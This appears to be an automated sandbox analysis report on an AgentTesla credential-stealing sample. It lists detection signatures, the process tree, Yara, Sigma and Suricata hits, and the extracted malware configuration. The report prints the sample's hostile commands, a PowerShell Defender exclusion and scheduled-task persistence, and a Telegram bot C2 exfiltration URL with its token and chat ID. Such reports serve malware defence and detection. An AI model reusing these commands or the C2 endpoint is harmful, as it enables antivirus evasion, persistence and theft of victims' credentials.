Edit tour

Windows Analysis Report
SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Overview

General Information

Sample name:	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Analysis ID:	1528790
MD5:	dd2f23684673ca3e5c9f578764769b67
SHA1:	df4b4d3a081e4a9160feef06452a7a4b9f2687b9
SHA256:	f707fe133dc28a26c1bf930647601bc36d7ffdabe046c8eac7a9c6c23e11e2ff
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe" MD5: DD2F23684673CA3E5C9F578764769B67)

powershell.exe (PID: 7444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7528 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe" MD5: DD2F23684673CA3E5C9F578764769B67)

eFzAvsOm.exe (PID: 7936 cmdline: C:\Users\user\AppData\Roaming\eFzAvsOm.exe MD5: DD2F23684673CA3E5C9F578764769B67)

schtasks.exe (PID: 8052 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

eFzAvsOm.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Roaming\eFzAvsOm.exe" MD5: DD2F23684673CA3E5C9F578764769B67)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendMessage?chat_id=-4195170748"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.2944094662.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.2945148313.0000000002B89000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2945148313.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.2944094662.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 7936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 7936	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 7936	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 7936	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 8104	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 8104	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: eFzAvsOm.exe PID: 8104	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.eFzAvsOm.exe.3e9e460.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.eFzAvsOm.exe.3e9e460.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.eFzAvsOm.exe.3e9e460.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.eFzAvsOm.exe.3e9e460.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31ec2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31f34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31fbe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32050:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x320ba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3212c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x321c2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32252:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31ec2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31f34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31fbe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32050:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x320ba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3212c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x321c2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32252:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31ec2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31f34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31fbe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32050:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x320ba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3212c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x321c2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32252:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33cc2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6eee2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6ef54:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33dbe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6efde:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e50:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f070:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33eba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f0da:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f2c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f14c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33fc2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f1e2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34052:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f272:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33cc2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f0e2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaa302:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f154:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaa374:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33dbe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f1de:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaa3fe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e50:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f270:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaa490:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33eba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f2da:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaa4fa:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f2c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f34c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaa56c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33fc2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f3e2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaa602:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33cc2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6eee2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6ef54:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33dbe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6efde:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e50:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f070:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33eba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f0da:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f2c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f14c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33fc2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f1e2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34052:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f272:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ParentProcessId: 7256, ParentProcessName: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", ProcessId: 7444, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eFzAvsOm.exe, ParentImage: C:\Users\user\AppData\Roaming\eFzAvsOm.exe, ParentProcessId: 7936, ParentProcessName: eFzAvsOm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp", ProcessId: 8052, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ParentProcessId: 7256, ParentProcessName: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp", ProcessId: 7528, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ParentProcessId: 7256, ParentProcessName: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", ProcessId: 7444, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ParentProcessId: 7256, ParentProcessName: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp", ProcessId: 7528, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T10:00:32.826938+0200	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49734	149.154.167.220	443	TCP
2024-10-08T10:00:36.063817+0200	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49736	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T10:00:32.826938+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49734	149.154.167.220	443	TCP
2024-10-08T10:00:36.063817+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49736	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T10:00:32.827094+0200	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49734	TCP
